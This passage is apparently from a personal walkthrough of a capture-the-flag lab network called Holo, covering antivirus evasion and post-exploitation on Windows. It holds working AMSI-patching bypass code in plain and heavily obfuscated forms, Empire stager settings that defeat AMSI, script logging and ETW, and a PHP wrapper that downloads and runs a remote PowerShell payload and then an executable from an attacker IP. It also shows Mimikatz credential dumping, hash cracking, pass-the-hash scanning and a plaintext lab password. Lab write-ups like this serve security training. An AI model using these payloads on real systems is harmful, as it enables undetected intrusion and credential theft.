AMSI will also utilize regex to aggregate risk assessment; this means that no one individual string might be flagged rather an entire code block. This can be painful for us to obfuscate and require other techniques like encoding, type acceleration, and run-time decoding.
To use AMSITrigger, we only need to specify two parameters, -u
, —url
or -i
, —inputfile
and -f
, —format
. Find example syntax below.
Syntax: .\\AMSITrigger.exe -u <URL> -f 1
or .\\AMSITrigger.exe -i <file> -f 1
- Above is the output from
AMSITrigger.exe
on the script from the previous task… you can also use-f 3
to visualize where the bad code block is within the source code
String Concatenation
The first method of manual obfuscation we will look at is string concatenation.
There are several various methods of string concatenation and other techniques that we can use to break signatures. Find an outline of the different methods below.
- Concatenate –
('co'+'ffe'+'e')
- Reorder –
('{1}{0}'-f'ffee','co')
- Whitespace –
( 'co' +'fee' + 'e')
String manipulation usually will help break single-string weak signatures; as previously explained, AMSI can also use regex to aggregate risk assessment. We will need to use more advanced techniques like encoding and type acceleration in regex signatures found below.
Type Acceleration
The second method of manual obfuscation we will look at is type acceleration. From the Microsoft documentation, "Type accelerators are aliases for .NET framework classes. They allow you to access specific .NET framework classes without having to type the full class name explicitly. For example, you can shorten the AliasAttribute
class from [System.Management.Automation.AliasAttribute]
to [Alias]
." https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1
We can abuse type accelerators to modify malicious types and break the signatures of types. For example, you can use PowerShell to create your own PSObject
and type accelerator to be used in place of the malicious type and, in turn, break the AMSI signature.
This may seem like an intimidating topic at first, but we can break it down into two lines of code to make it easier to understand.
- To create a type accelerator, we will need to first declare a
PSObject
in Assembly to retrieve the type.
[PSObject].Assembly.GetType
- We will then need to add our malicious type to
System.Management.Automation.TypeAccelerators
. This will allow us to use the type accelerator as a separate type from the malicious type. Find example code below.
("System.Management.Automation.TypeAccelerators")::Add('dorkstork', [system.runtime.interopservices.marshal])
- We can combine these two code snippets to create a final
PSObject
containing the newly created type.
[PSObject].Assembly.GetType("System.Management.Automation.TypeAccelerators")::Add('dorsktork', [system.runtime.interopservices.marshal])
- We can then replace the
PSObject
at the location of the malicious type. Find a comparison of the new and old code below.
Old: [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
New: [dorkstork]::copy($buf, 0, $BufferAddress, 6);
Now we have a newly created type accelerator that will break the signature attached to it.
For more information about creating type accelerators within PowerShell, check out this blog, https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell
Obfuscated amsi_bypass.ps1
$MethodDefinition = "
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[PSObject].Assembly.GetType("System.Management.Automation.TypeAccelerators")::Add('d1kst1k', [system.runtime.interopservices.marshal])
[d1kst1k]::copy($buf, 0, $BufferAddress, 6);4
Further Reading…
For more information about manual obfuscation and AMSI obfuscation, check out the following resources.
- https://amsi.fail/
- https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
- https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
- https://www.youtube.com/watch?v=lP2KF7_Kwxk
- https://www.youtube.com/watch?v=F_BvtXzH4a4
Task 33 – AV Evasion – JU57 0BFU$C47E 1T
Obfuscating AMSI bypass code
Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation) is a utility built by Daniel Bohannon and Cobbr. It is used to take a series of arguments/obfuscation tokens and automatically obfuscate provided code. From their GitHub, "Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.". Red teamers can use obfuscation to make reverse engineering/analysis harder and, in some cases, bypass anti-virus and other detections.
Invoke-Obfuscation syntax can seem very large and scary at first if you don’t understand how it breaks down the obfuscation tokens. We can follow along with this guide created by the author of Invoke-Obfuscation to get familiar with the syntax – https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide.
To begin our obfuscation attempts, we will need to set the script block or the payload we want to obfuscate and then specify tokens to use. Invoke-Obfuscation offers both an argument parsing command-line tool as well as a friendly CLI. For our purposes, we will be using the command line. We will only be covering an example of using a token to bypass anti-virus, creating a token command, and the various use cases are out of scope for this task.
Below is the command we will use to obfuscate our payload. The token command used at the time of writing will bypass anti-virus for some payloads or tools. We will be breaking this command down later in this task.
Invoke-Obfuscation -ScriptPath C:\Path\To\powershell_script.ps1 -Command 'Token\\String\\1,2,Token\\Variable\\1,Token\\Whitespace\\1' -Quiet -NoExit
To break it down:
-
-ScriptPath
points to the PowerShell script to obfuscate-ScriptBlock {'<PAYLOAD>'}
will also work for obfuscating scripts or commands directly
-
-Command
is where we string together our obfuscation commands:-
Token\\String\\1
relates to the first string obfuscation under the token section… it simply concatenates the string. Below is a screenshot of the output of STRING in the CLI:
-
2
relates to the 2nd option in the screenshot above,Reorder
– if you do not supply the full ‘path’ to next obfuscation command (e.g.Token\\String\\2
) it will append the path from the previous command depending on what is missing… -
Token\\Variable\\1
relates to the 1st VARIABLE type of TOKEN, and will . As mentioned above, since we left offToken\\
it has appeneded it from the previous command:
-
Token\\Whitespace\\1
adds random whitespaces between the concatenation:
-
-
-Quiet
simply makes the output less verbose -
-NoExit
ensures that you don’t exit from Invoke-Obfuscation‘s CLI after it has obfuscated the code to your liking.
Further Obfuscated amsi_bypass.ps1
${methODdEf<code>i
NIT
ion} = (' ' + ' ' + ' '+' ' + ' ' + ("[DllImport("kernel32
")] "+ '') + ' '+' ' + ' ' + 'p' + ( "{1}{0}"-f 'ic ','ubl' ) + 'st'+ ( "{1}{0}" -f'c ','ati') +( "{0}{1}"-f 'ext','ern' ) +' '+ 'Int' + ( "{0}{1}"-f 'P','tr ' ) + ("{0}{1}"-f 'G','etPr' )+'oc' +'Ad'+ 'dre'+ 's'+ 's'+( ( ("{2}{0}{1}"-f'r',' ','(IntPt' ) )) + ( "{1}{0}"-f 'od','hM' )+ ("{1}{0}" -f'e,','ul') +' '+ ("{1}{0}" -f 'tri','s') +'n','am','ro' +'cN' + ((( "{1}{0}{2}"-f 'e); ') ) ) + ' '+' '+' ' + ' ' + ' ' + ( "[DllImport("kernel32
")] " + '' )+ ' '+ ' ' +' '+ 'pu'+'b' + ("{0}{1}" -f'lic',' ' )+'st' + ( "{1}{0}"-f 'c ','ati')+'ext' +'er' +'n '+ 'In' + ( "{0}{1}" -f'tP','tr ' ) + ("{1}{0}" -f'ule','GetMod' )+ ( "{0}{1}"-f'Ha','ndl' )+ 'e(s' +("{1}{0}"-f'ng','tri' )+' ' + 'lpM' +( "{0}{1}"-f 'odu','leN' ) + 'a' + 'm' + 'e'+ ( (( "{1}{2}{0}"-f' ',');',' ') )) + ' ' +' '+' ' + ( "[DllImport("kernel32
")] "+'' ) + ' '+' '+' '+ 'pub'+ ("{0}{1}" -f 'lic',' ' ) + 'sta' +("{1}{0}" -f ' ','tic' )+'ex'+ ( "{0}{1}"-f'ter','n ' ) + 'b'+( "{0}{1}"-f'o','ol ' ) +( "{1}{0}" -f'u','Virt' ) +'al' + ( "{2}{0}{1}"-f'ot','ec','Pr')+ (( ( "{1}{0}" -f 'IntP','t(' )) ) + 'tr ' +( "{0}{2}{1}"-f'lpA','es','ddr') +'s,' + ' '+'U' +( "{0}{1}"-f'In','tP' )+ 'tr '+'d' +("{0}{1}" -f 'wSiz','e,' )+ ' ' +'u' +( "{0}{1}"-f 'int',' ') + 'f'+ ( "{2}{1}{0}" -f'ot','Pr','lNew' ) + ("{1}{0}"-f',','ect') + ' ' +'out' + ' '+ 'uin'+ 't '+ 'l'+ ( "{0}{1}" -f 'pflO','ldP' ) + ( ( ( "{1}{0}{2}"-f 'ect)','rot',';') ) ) +' ' ) ; ${keRN
El32} = Add-Type -MemberDefinition ${METhODdEfIN
I`TioN} -Name ('K'+ 'ern' +( "{1}{0}" -f'2','el3') ) -NameSpace (("{0}{1}" -f'Win','3' )+ '2' ) -PassThru ; ${a`BSd} = ( 'Ams'+'iS' ) + ( 'ca'+'nB' + ( "{0}{1}"-f'uffe','r' ) ); ${HAn
DLe} = [Win32.Kernel32]::GetModuleHandle( ( 'a'+( "{2}{0}{1}"-f '.d','ll','msi' )) ); [IntPtr]${BufF
ErA
DDREss} = [Win32.Kernel32]::GetProcAddress( ${HAN
dle}, ${Ab`SD}) ; [UInt32]${S`iZE} = 0x5; [UInt32]${pROTECTF
lAg} = 0x40; [UInt32]${oldpROTE
cTFl
Ag} = 0; [Win32.Kernel32]::VirtualProtect( ${BuFFerADDr
eSS}, ${SizE}, ${prOTeC
TFLAg}, [Ref]${oLd
proT
EC`TFlag} ) ; ${b`Uf} = [Byte[]]( [UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3 ) ; [PSObject].Assembly.GetType( ( ("{1}{0}"-f'st','Sy' ) +'em'+'.Ma' + ("{0}{1}"-f'nage','m' )+ 'ent' +'.A' +'uto' +("{0}{1}" -f 'mation.T','y') +'p'+'eA' + 'cc'+ 'e' + ("{0}{1}" -f'l','era' )+ ( "{1}{0}" -f's','tor' ) ) )::Add( (( "{0}{1}"-f 'd','1ks')+'t1k' ), [system.runtime.interopservices.marshal] ) [d1kst1k]::copy( ${BUf}, 0, ${b
UffeRAdD
R`Ess}, 6) ; 4
Task 34 – AV Evasion – ‘Ca’ + ‘n’ + ‘you’ + ‘ ‘ + ‘see’ + ‘me now’ + ‘?’
Bypassing Defender and AV
As new EDR solutions and prevention methods are released, we as red teamers need to change and evolve our TTPs to work around the ever-growing blue team. Often, techniques themselves don’t change, but scripts and solutions like https://github.com/IonizeCbr/AmsiPatchDetection and indicators can make it harder to get our payloads and tools past even when bypassed and obfuscated, or we have other restrictions in place we need to workaround. In this case, we can use code analysis and manual code review to break signatures. A few tools can help us along the way for code analysis, including ThreatCheck (https://github.com/rasta-mouse/ThreatCheck), and DefenderCheck (https://github.com/matterpreter/DefenderCheck). Both of these tools will ingest a given file and output the found bytes attached to signatures.
ThreatCheck
ThreatCheck has a small argument list, and syntax is relatively straightforward. Find a list of arguments and a syntax example below.
-e
or—engine
(AMSI or Defender)-f
or—file
-u
or—url
Syntax: ThreatCheck.exe -f <file>
In this task, we will be focusing on analyzing the Covenant source code; however, ThreatCheck can be used on any tools or payloads you need to clean.
Below you will find an example of the first bad byte that ThreatCheck will discover. ThreatCheck will aggregate bytes based on their signature strength, the lowest being the strongest signature and what you should prioritize breaking.
STOP THE PRESS – Covenant is NOT for us.
OK, so it was about this point that I discovered that Covenant was not going to be the solution for this task in this day in age. I am sure that with enough manual tweaking you could potentially get anything working… but I didn’t want to have to manually re-write each Grunt and then obfuscate it with an outside utility (and there isn’t many that were even successful against the new Defender). So I turned my attention back to Empire, which is still to this day being developed and updated.
I tried a range of C# agents and modifications to get it to work and the best I could achieve was undetectable using C# obfuscators that were… well, not "free". Wanting to not have to use paid tools to complete the task, I decided that finding another method was best.
So I turned back to the old faithful multi/launcher
powershell variant, and with a bit of tweaking to the setup I managed to get it to produce a payload that bypasses AMSI, ScriptBlockLog and ETW, with the right level of obfuscation to trick a current-day install of Windows 10 to running an agent. Here is the configuration:
usestager multi/launcher
set Listener <YOUR_HTTP_LISTENER>
set Base64 False
set Bypasses liberman scriptblocklog etw
set Obfuscate True
set ObfuscateCommand Token\\String\\2,Token\\Command\\2,Token\\Argument\\3,Token\\Member\\3,Token\\Variable\\1,Token\\Type\\2
Although when running the outputted script it will produce errors (and may not work the first time ran), this will still get us the initial foothold.
(first line was the initial attempt, second line is the successful connection)
But what about SharpEDRChecker?!
Yeah… about that…
The new BC-Security builds of Empire use the same Roslyn compiler method to build and send copies of C# apps to agents on the fly that Covenant uses, taken directly from Covenant itself… This meant that it should be relatively easy to port it over to Empire right?
I managed to somewhat integrate SharpEDRChecker into the Empire csharp module. I had to manually copy System.Xml.Linq.dll
from my Win10 development box into /opt/Empire/empire/server/csharp/Covenant/Data/AssemblyReferences/net40
Also, the task does NOT explain how to build the required YAML project file for SharpEDRChecker… so I had to research and build my own.
- Name: SharpEDRChecker
Aliases: []
Description: C# application that checks for AV and EDR on target.
Author:
Name: stimpz0r
Handle: stimpz0r
Link: http://stimpz0r.com
Help:
Language: CSharp
CompatibleDotNetVersions:
- Net40
Code: |
using System;
using System.IO;
using System.Reflection;
using SharpEDRChecker;
public static class Task
{
public static Stream OutputStream { get; set; }
public static string Execute(string Command = "")
{
try
{
TextWriter realStdOut = Console.Out;
TextWriter realStdErr = Console.Error;
StreamWriter stdOutWriter = new StreamWriter(OutputStream);
StreamWriter stdErrWriter = new StreamWriter(OutputStream);
stdOutWriter.AutoFlush = true;
stdErrWriter.AutoFlush = true;
Console.SetOut(stdOutWriter);
Console.SetError(stdErrWriter);
string[] args = Command.Split(' ');
typeof(Program).GetMethod("Main", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { args });
Console.Out.Flush();
Console.Error.Flush();
Console.SetOut(realStdOut);
Console.SetError(realStdErr);
OutputStream.Close();
return "";
}
catch (Exception e)
{
if (OutputStream != null)
{
OutputStream.Close();
}
return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace;
}
}
}
TaskingType: Assembly
UnsafeCompile: false
TokenTask: false
Options: []
ReferenceSourceLibraries:
- Name: SharpEDRChecker
Description: SharpEDRChecker is a .NET assembly that checks for AV and EDR systems installed on the target.
Location: SharpEDRChecker\
Language: CSharp
CompatibleDotNetVersions:
- Net40
ReferenceAssemblies:
- Name: mscorlib.dll
Location: net40\mscorlib.dll
DotNetVersion: Net40
- Name: Microsoft.CSharp.dll
Location: net40\Microsoft.CSharp.dll
DotNetVersion: Net40
- Name: System.dll
Location: net40\System.dll
DotNetVersion: Net40
- Name: System.Core.dll
Location: net40\System.Core.dll
DotNetVersion: Net40
- Name: System.Data.dll
Location: net40\System.Data.dll
DotNetVersion: Net40
- Name: System.Data.DataSetExtensions.dll
Location: net40\System.Data.DataSetExtensions.dll
DotNetVersion: Net40
- Name: System.Management.dll
Location: net40\System.Management.dll
DotNetVersion: Net40
- Name: System.ServiceProcess.dll
Location: net40\System.ServiceProcess.dll
DotNetVersion: Net40
- Name: System.XML.dll
Location: net40\System.XML.dll
DotNetVersion: Net40
- Name: System.Xml.Linq.dll
Location: net40\System.Xml.Linq.dll
DotNetVersion: Net40
EmbeddedResources: []
ReferenceAssemblies: []
EmbeddedResources: []
Unfortunately, even after all that, the agent will run the task, but never returns anything… this is also true with built-in csharp modules such as Seatbelt (which uses an identical method)… this COULD be Defender blocking the downloaded apps… but more likely that it is just broken.
Both Covenant and Empire also use ConfuserEx to obfuscate the compiled binaries – that not only breaks other obfuscation, but does not stop Defender finding the binary at all… it leaves the variables / strings in plain text for the world (and Defender) to see. I ended up disabling it in the Empire source code and using another (non-free) obfuscator to hide the agents from Defender.
Task 35 – AV Evasion – Wrapping the burrito
This task basically covers building a PHP wrapper to use on S-SRV01 to upload and execute the payload… since I opted for an Empire powershell payload, instead of breaking it down into two commands like the task shows, I will do it in one.
The below uses Invoke-Webrequest
(or IWR) to download the obfuscated script then starts the Empire agent via IEX (Invoke-Expression
). This will leave the .ps1
script on the target machine… (perhaps I should have added on a rm?)
NOTE: I took this to a new level for mine… well, in the sense that no matter how hard I tried, I could not get the powershell stager to work… so I switched to using a 2 stage powershell/C# loader (which was probably overkill)
CODE >> stage0.php
<?php
function stage0() {
$init = "powershell.exe -nop -sta -ep bypass";
$payload = "IEX(New-Object Net.WebClient).downloadString('http://10.50.107.119:9090/9x.ps1')";
$execution_command = "shell_exec";
$query = $execution_command("$init $payload");
echo $query;
}
stage0();
die();
?>
CODE >> stage1.ps1 (semi-obfuscated)
- Final variant was obfuscated with Invoke-Obfuscation:
- Token\String\1
- Token\Type\1
- Token\Variable\1
- Token\Argument\2
- Token\Command\1
- Token\Member\2
- String\3
The below has minor obfuscation, the very first variable being something I modified the source of Empire to achieve as it was causing issues with AMSI.
This script not only creates an AMSI bypass, but a ScriptBlockLogging and ETW bypass to boot. It then downloads and executes an obfuscated binary that starts the Empire agent.
If(${PS<code>Ve
rSIonTa
BLe}.PSVeRsIoN.MajoR -GE 3){$MethodDefinition = "[DllImport("kernel32
")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32
")]public static extern IntPtr GetModuleHandle(string lpModuleName);[DllImport("kernel32
")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);";$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;$ABSD = 'AmsiS'+'canBuffer';$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);[UInt32]$Size = 0x5;[UInt32]$ProtectFlag = 0x40;[UInt32]$OldProtectFlag = 0;[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag,[Ref]$OldProtectFlag);$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57,[UInt32]0x00,[Uint32]0x07,[Uint32]0x80,[Uint32]0xC3);[system.runtime.interopservices.marshal]::copy($buf, 0,$BufferAddress, 6); $11Bd8=[ReF].AsSEmBly.GetTYpE('System.Management.Automation.Utils')."GeTFiELd"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($11bd8){$A18E1=$11bD8.GEtValuE($NULL);If($A18e1['ScriptB'+'lockLogging']){$a18e1['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$A18e1['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VaL=[COlLECtIONS.GeNeRiC.DictIoNARY[STRIng,SysTEM.ObJEct]]::NEw();$vaL.AdD('EnableScriptB'+'lockLogging',0);$VaL.AdD('EnableScriptBlockInvocationLogging',0);$A18E1['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Val}ELSE{[SCrIpTBLoCK]."GEtFIe
ld"('signatures','N'+'onPublic,Static').SETValue($NuLl,(NEw-OBJect ColleCTionS.GenErIc.HAsHSET[StRiNg]))}[System.Diagnostics.Eventing.EventProvider]."GetField"('m_e'+'nabled','Non'+'Public,'+'Instance').SetValue([Ref].Assembly.GetType('Syste'+'m.Management.Automation.Tracing.PSE'+'twLogProvider')."GetFie
ld"('et'+'wProvider','NonPub'+'lic,S'+'tatic').GetValue($null),0);}; Invoke-WebRequest http://10.50.107.119:9090/s2.exe -OutFile s2.exe; .\s2.exe
s2.exe
was an Empire C# agent, obfuscated using a non-freeware obfuscator.
Task 36 – Post Exploitation – That’s not a cat that’s a dawg
This task shows the steps on how to execute Mimikatz via Covenant… since I am not using Covenant (for reasons previously mentioned) I have instead shown the steps below for running Mimikatz via the csharp/Sharpsploit.Credentials/Mimikatz
module in Empire.
ENUM >> Mimikatz (via Empire)
(Empire: S5AT6TXN) > usemodule csharp/Sharpsploit.Credentials/Mimikatz
[*] Set Agent to S5AT6TXN
Author cobbr_io
Background False
Description Execute a mimikatz command.
Language csharp
Name csharp/Sharpsploit.Credentials/Mimikatz
NeedsAdmin False
OpsecSafe False
┌Record Options─┬──────────────────────────┬──────────┬─────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├───────────────┼──────────────────────────┼──────────┼─────────────────────────────────┤
│ Agent │ S5AT6TXN │ True │ Agent to run module on. │
├───────────────┼──────────────────────────┼──────────┼─────────────────────────────────┤
│ Command │ sekurlsa::logonPasswords │ True │ Mimikatz command to execute. │
├───────────────┼──────────────────────────┼──────────┼─────────────────────────────────┤
│ DotNetVersion │ Net35 │ True │ .NET version to compile against │
└───────────────┴──────────────────────────┴──────────┴─────────────────────────────────┘
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > set Command privilege::debug token::elevate sekurlsa::logonpasswords
[*] Set Command to privilege::debug token::elevate sekurlsa::logonpasswords
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > execute
[*] Tasked S5AT6TXN to run Task 55
[*] Task 55 results received
.#####. mimikatz 2.2.0 (x64) #19041 Jun 9 2021 18:55:28
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
668 {0;000003e7} 1 D 21315 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 1069076 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 1284062 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 284199 (00000000:00045627)
Session : Interactive from 1
User Name : watamet
Domain : HOLOLIVE
Logon Server : DC-SRV01
Logon Time : 1/27/2022 4:36:17 AM
SID : S-1-5-21-471847105-3603022926-1728018720-1132
msv :
[00000003] Primary
* Username : watamet
* Domain : HOLOLIVE
* NTLM : <REDACTED>
* SHA1 : <REDACTED>
* DPAPI : <REDACTED>
tspkg :
wdigest :
* Username : watamet
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : watamet
* Domain : HOLO.LIVE
* Password : <REDACTED>
ssp :
credman :
...
CREDS - watamet's NTLM hash
LOOT >> watamet‘s cracked hash (via HashCat)!
❯ hashcat -m 1000 s-srv01_watamet.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
<REDACTED>:<REDACTED>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: <REDACTED>
Time.Started.....: Thu Jan 27 17:01:42 2022 (3 secs)
Time.Estimated...: Thu Jan 27 17:01:45 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4220.2 kH/s (0.26ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10780672/14344385 (75.16%)
Rejected.........: 0/10780672 (0.00%)
Restore.Point....: 10776576/14344385 (75.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Nov2599 -> NicoleBates3
Started: Thu Jan 27 17:01:20 2022
Stopped: Thu Jan 27 17:01:46 2022
CREDS - watamet
What domain user's credentials can we dump on S-SRV01?
What is the domain user's password that we can dump on S-SRV01?
Task 37 – Post Exploitation – Good Intentions, Courtesy of Microsoft: Part II
This room covers Pass the Hash (PtH) attacks… these have been covered before in other AD related rooms, but one handy tool that has not been touched on before is CrackMapExec (CME).
From the CrackMapExec GitHub, "CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions." We will be using only one of the many features of CME. We can pass the hash over SMB, SSH, WinRM, LDAP, or MSSQL; we recommend using SMB.
crackmapexec smb 10.200.110.0/24 -u <user> -d <domain> -H <hash>
ENUM >> CrackMapExec scanning 10.200.110.0/24 via SMB
❯ crackmapexec smb 10.200.110.0/24 -u watamet -d holo.live -H <REDACTED>
SMB 10.200.110.35 445 PC-FILESRV01 [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:holo.live) (signing:False) (SMBv1:False)
SMB 10.200.110.31 445 S-SRV01 [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:holo.live) (signing:False) (SMBv1:False)
SMB 10.200.110.30 445 DC-SRV01 [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:holo.live) (signing:False) (SMBv1:False)
SMB 10.200.110.35 445 PC-FILESRV01 [+] holo.live\watamet <REDACTED>
SMB 10.200.110.31 445 S-SRV01 [+] holo.live\watamet <REDACTED> (Pwn3d!)
SMB 10.200.110.30 445 DC-SRV01 [+] holo.live\watamet <REDACTED>
NOTE: This room also goes over using Evil-WinRM to access
PC-FILESRV01
– however this does not work in this case, aswatamet
does not have WinRM access toPC-FILESRV01
… not sure if that was intentional or not (as the task does mention "If successfully authenticated, you should now have a working WinRM shell that you can use to execute remote commands.")
However, watamet
DOES have RDP access to that box… sigh slowness…
FLAG - PC-FILESRV01 user.txt
What is the hostname of the remote endpoint we can authenticate to?
Task 38 – Post Exploitation – Watson left her locker open
This task covers AppLocker, a Microsoft tool to control policies to specify where users can execute programs on the machine. I will leave out the long-winded explination (as it is all there in the task), however I will leave the link to the PowerShell script used to enumerate AppLocker, and a link to a Github with a bunch of info on AppLocker (including default bypasses).
-
For a complete list of default directories to bypass AppLocker along with other techniques, check out this GitHub repo (https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md).
-
To aid us in quickly identifying directories we can use to execute programs; we can use an AppLocker directory check script (https://github.com/HackLikeAPornstar/GibsonBird/blob/master/chapter4/applocker-bypas-checker.ps1).
ENUM >> applocker-bypass-checker.ps1 output
PS C:\Users\watamet\Documents> .\abc.ps1
[*] Processing folders recursively in C:\windows
[+] C:\windows\Tasks
[+] C:\windows\tracing
[+] C:\windows\System32\spool\drivers\color
[+] C:\windows\tracing\ProcessMonitor
Task 39 – Situational Awareness – So it’s just fancy malware?
This task covers the usage of Seatbelt and SharpEDRChecker to detect AV / Anti-Malware tools.
Seatbelt
- URL: https://github.com/GhostPack/Seatbelt
Seatbelt.exe -group=system
will cover the scans that check for AVSeatbelt.exe -group=remote -computername=PC-FILESRV01 -username=holo.live\watamet -password=Nothingtoworry!
would do a remote check…
SharpEDRChecker
- URL: https://github.com/PwnDexter/SharpEDRChecker
.\SharpEDRChecker.exe
to run all tests-
Results can be depenedant of account access – SYSTEM accounts MAY show more information.
NOTE: The below question and answer is correct, but there was no sign of AMSI running on this machine. I did the
Invoke-Mimikatz
test and it did not return the usual AMSI "malicious’ response (meaning it is not loaded).
What anti-malware product is employed on PC-FILESRV01?
What anti-virus product is employed on PC-FILESRV01?
Task 40 – Situational Awareness – SEATBELT CHECK!
This task further covers Seatbelt enumeration…
Seatbelt.exe all
to run all checks.
I won’t include the output of this command, it’s MASSIVE!
What CLR version is installed on PC-FILESRV01?
What PowerShell version is installed on PC-FILESRV01?
What Windows build is PC-FILESRV01 running on?
Task 40 – Situational Awareness – ALL THE POWER!
This task covers enumeration with PowerView.ps1
.
This tool is no longer supported but is still considered a standard for enumeration. From the PowerSploit GitHub, "PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net *
commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality."
To use the script, we will first need to import it then run the commands that we want to enumerate the endpoint. Find syntax and a few essential commands you can use with PowerView.
Syntax: Import-Module .\PowerView.ps1
Get-NetLocalGroup
PS C:\Windows\System32\spool\drivers\color> Get-NetLocalGroup
ComputerName GroupName Comment
------------ --------- -------
PC-FILESRV01 Access Control Assistance Operators Members of this group can remotely query autho...
PC-FILESRV01 Administrators Administrators have complete and unrestricted ...
PC-FILESRV01 Backup Operators Backup Operators can override security restric...
PC-FILESRV01 Certificate Service DCOM Access Members of this group are allowed to connect t...
PC-FILESRV01 Cryptographic Operators Members are authorized to perform cryptographi...
PC-FILESRV01 Device Owners Members of this group can change system-wide s...
PC-FILESRV01 Distributed COM Users Members are allowed to launch, activate and us...
PC-FILESRV01 Event Log Readers Members of this group can read event logs from...
PC-FILESRV01 Guests Guests have the same access as members of the ...
PC-FILESRV01 Hyper-V Administrators Members of this group have complete and unrest...
PC-FILESRV01 IIS_IUSRS Built-in group used by Internet Information Se...
PC-FILESRV01 Network Configuration Operators Members in this group can have some administra...
PC-FILESRV01 Performance Log Users Members of this group may schedule logging of ...
PC-FILESRV01 Performance Monitor Users Members of this group can access performance c...
